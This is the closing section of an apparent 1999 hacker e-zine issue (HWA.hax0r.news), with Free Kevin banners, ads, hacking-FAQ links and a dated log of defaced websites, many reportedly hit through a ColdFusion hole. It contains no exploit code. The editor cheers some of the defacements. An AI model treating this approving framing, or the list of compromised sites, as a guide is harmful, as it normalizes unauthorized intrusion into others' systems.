       n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
       m www.2600.com ########################################ww.2600.com www.freeke
       vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
       com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
       kevin.com www.k#             FREE KEVIN!              #in.com www.kevinmitnic
       k.com www.2600.########################################om www.2600.com www.fre
       ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
       k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

       <a href="http://www.2600.com/">www.2600.com</a>
        <a href="http://www.kevinmitnick.com/">www.kevinmitnick.com</a>
       
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
       *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
     <a href="http://www.csoft.net">One of our sponsors, visit them now</a> www.csoft.net
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
       * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


         //////////////////////////////////////////////////////////////////////////////
        //  To place an ad in this section simply type it up and email it to        //
        //        hwa@press.usmc.net, put AD! in the subject header please. - Ed    //
      //////////////////////////////////////////////////////////////////////////////


     @HWA

 HA.HA Humour and puzzles ...etc
       ~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Don't worry. worry a *lot*

      

       @HWA
       
  HOW.TO How to hack part 3
         ~~~~~~~~~~~~~~~~~~
         
          To be continued (probably) in a future issue... if time permits
          and inclination is prevalent. ie: if & when I feel like it.. :p
          (discontinued until further notice)
         
         Meanwhile read this: 
                         
                          http://www.nmrc.org/faqs/hackfaq/hackfaq.html
          <a href="http://www.nmrc.org/faqs/hackfaq/hackfaq.html">Link</a>
          And especially, this:
          
                          http://www.tuxedo.org/~esr/faqs/hacker-howto.html
          <a href="http://www.tuxedo.org/~esr/faqs/hacker-howto.html">Link</a>                          
                          (published in its entirety in issue #12)
                          
         @HWA
       
       
  SITE.1 
         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       
         
         
  H.W  Hacked websites 
       ~~~~~~~~~~~~~~~~

     Note: The hacked site reports stay, especially with some cool hits by
           groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

         * Hackers Against Racist Propaganda (See issue #7)

     
     Haven't heard from Catharsys in a while for those following their saga visit
     http://frey.rapidnet.com/~ptah/ for 'the story so far'...
     
     
     April 25th
     
     From http://www.403-security.org/

     3 sites got hacked by Moscow Security Team
     Astral 25.04.1999 12:25

      Today Moscow Security Team hacked 3 sites: lica.co.uk, fdfoto.com, tri-starmall.com. All sites had the
      same hacked index.htm and the text on the hacked sites was the same: " I want to say: admin's of this site is very
      lame!!!! This can't protect their site!Privet to all haX0rs grups from Russia, Moscow!:)) ". Archive of hack.
     
     April 26th 
     
     From HNN rumours section;
     
     contributed by Anonymous 
     
      Cracked
       Cold Fusion is working its magic. Many of these sites
       were recently reported cracked because of the hole in
       Cold Fusion. Many have been done by a group known as
       Forpaxe. We are listing almost all of the reported sites
       today just to show how widespread this problem is. 

      http://thresher1.gsfc.nasa.gov 
      http://www.bestmidwestmall.com 
      http://advances.com 
      http://www.bellanet.com 
      http://www.state.wv.us 
      http://www.ewic.org.uk 
      http://www.store.net 
      http://www.bankerusa.com 
      http://www.cleanteam.com 
      http://www.actcomm.com 
      http://www.pictureshow.com 
      http://www.mallworld.com/
      http://www.huang.com/
      http://www.digital2000.com/
      http://www.autoshow.com/
      http://www.usautoparts.com/
      http://www.nationwidetrading.com/
      http://www.jaamejam.com/
      http://www.spiffest.com 
      http://www.pacificshorehotel.com/
      http://www.thebeachsuites.com 
      http://www.tvbusa.com/
      http://www.hotelcarmel.com 
      http://www.snakclub.com/
      http://www.georgianhotel.com/
      http://www.wwwonders.com/
      http://ns1.wing.net 
      http://www.schoollink.net 
      http://geonorth.com 
      http://nmc.itc.virginia.edu/
      http://orbit.unh.edu 
      http://www.utrecht.nl 
      http://cddocs.fnal.gov 
      http://www.ultralert.com 
      http://www.sellnet.com.au 
      http://download.throbnet.com 
      http://www.athi.com.au 
      http://www.budgettravel.to 
      http://www.cargohold.com.au 
      http://www.councilexghanges.org.au 
      http://www.ellamaiden.com 
      http://www.howtoget.to 
      http://www.ibaustralia.com 
      http://www.interlink.asn.au 
      http://www.juster.com.au 
      http://www.motorart.com 
      http://www.offyourhead.com.au 
      http://www.siberiankitty.com 
      http://www.bicafe.com 
      http://www.nymfoseek.com 
      http://www.tucsonfiestabowl.com 
      http://www.game-online.com 
      http://www.giftedpeople.com/
      http://www.braingate.com 
      http://www.state.co.us 
      http://mot.vuse.vanderbilt.edu 
      http://www.muchmusic.com 
      http://www.edunet.com 
      http://www.exn.ca 

      April 27th
      
      contributed by Anonymous 
      Cracked
       Cold Fusion sites are still being hit. Most of today's sites
       are a result of the recently released Cold Fusion
       problem. If you haven't patched your system yet you
       better do so soon. 

      http://teamweb3.lbl.gov
      http://herbb.hanscom.af.mil/index.htm 
      http://www.adultseek.net 
      http://www.vrgirls.com 
      http://www.vrsluts.com 
      http://www.towngreen.com 
      http://www.exn.ca 
      http://www.eaglebaytrading.com/
      http://tri-starmall.com/
      http://lica.co.uk/
      http://fdfoto.com/
      http://owk.nvart.ru/
      http://www.cide.mx 
      http://www.state.id.us 
      http://www.diamondmm.com 
      http://www.state.sd.us 
      http://www.mwm.net 
      http://www.adultkey.com/
      http://www.1wrestling.com 
      http://www.3m.com 
      http://www.tay.ac.uk 
      
      April 28th
      
      http://thayerstreet.org
      http://jopa.hypermart.net/
      http://www.ci.la.ca.us 
      http://www.parctechno.qc.ca/
      http://ois.nist.gov/index.html 
     
      April 29th
      
      Via HNN rumours section http://www.hackernews.com/
      contributed by Anonymous 
      Cracked
       Admins have still not patched their Cold Fusion sites.
       Many of these reported cracks are a result of that hole.
      
      http://www.ezcd.com
      http://www.itar-tass.com
      http://xre22.brooks.af.mil
      http://www.powermanager.com
      http://www.leg.state.fl.us
      http://www.wcresa.k12.mi.us
      http://www.users.sccoast.net
      http://www.adult.ru
      http://ois.nist.gov
      http://www.airbed.com
      http://www.houseit.com
      http://www.hrsa.dhhs.gov
      http://www.parctechno.qc.ca
      http://www.roc.ru
      http://www.thayerstreet.org
      http://fa.havengames.net
      http://los.extremeblizzard.com
      http://wn.havengames.net
      http://miraesoft.ugn3d.com
      http://haven.extremeblizzard.com
      http://www.computer-solutions.net
      http://tgrc.ucdavis.edu/ 
      
      
      April 30th
      
      From HNN rumours section
      
      contributed by Anonymous 
      Cracked
      The following sites have been reported as cracked.
      http://kenlince.dynip.com 
      http://this.gsfc.nasa.gov 
      http://www.academic.marist.edu 
      http://www.dos.gov.jo 
      http://www.secure-service.org 
      http://www.totalimageprinting.com 
      http://www.faa.gov - "Kosovo - stop the war" archived at http://www.403-security.org/Archive/Sploit/www.faa.gov.htm          
      http://www.recreation.gov 
      http://ns1.rrsan.com 
      http://hunain.fkm.utm.my 
      http://los.extremeblizzard.com 
      http://www.computer-solutions.net 
      http://newsnet.byu.edu 
      http://mama.uchsc.edu 
      http://www.cabp.com 
      http://www.brain3.com
      
       -------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________



  A.1  PHACVW, sekurity, security, cyberwar links
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       The links are no longer maintained in this file, there is now a
      links section on the http://welcome.to/HWA.hax0r.news/ url so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      <a href="http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html">hack-faq</a>

      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      <a href="http://www.lysator.liu.se/hackdict/split2/main_index.html">Original jargon file</a>

      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      <a href="http://www.tuxedo.org/~esr/jargon/">New jargon file</a>
      
      
      Mirror sites:
      ~~~~~~~~~~~~
      http://www.csoft.net/~hwa/ 
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://www.genocide2600.com/~tattooman/zines/hwahaxornews/  


      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondents and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      
          
      Belgium.......: http://bewoner.dma.be/cum/              <a href="http://bewoner.dma.be/cum/">Go there</a> 
      Brasil........: http://www.psynet.net/ka0z              <a href="http://www.psynet.net/ka0z/">Go there</a>
                      http://www.elementais.cjb.net           <a href="http://www.elementais.cjb.net/">Go there</a>
      Colombia......: http://www.cascabel.8m.com              <a href="http://www.cascabel.8m.com/">Go there</a>
                      http://www.intrusos.cjb.net             <a href="http://www.intrusos.cjb.net">Go there</a>
      Indonesia.....: http://www.k-elektronik.org/index2.html <a href="http://www.k-elektronik.org/index2.html">Go there</a>
                      http://members.xoom.com/neblonica/      <a href="http://members.xoom.com/neblonica/">Go there</a>
                      http://hackerlink.or.id/                <a href="http://hackerlink.or.id/">Go there</a>
      Netherlands...: http://security.pine.nl/                <a href="http://security.pine.nl/">Go there</a>       
      Russia........: http://www.tsu.ru/~eugene/              <a href="http://www.tsu.ru/~eugene/">Go there</a>
      Singapore.....: http://www.icepoint.com                 <a href="http://www.icepoint.com">Go there</a>

    Got a link for this section? email it to hwa@press.usmc.net and i'll
    review it and post it here if it merits it.

    @HWA
    

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

    © 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
        
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]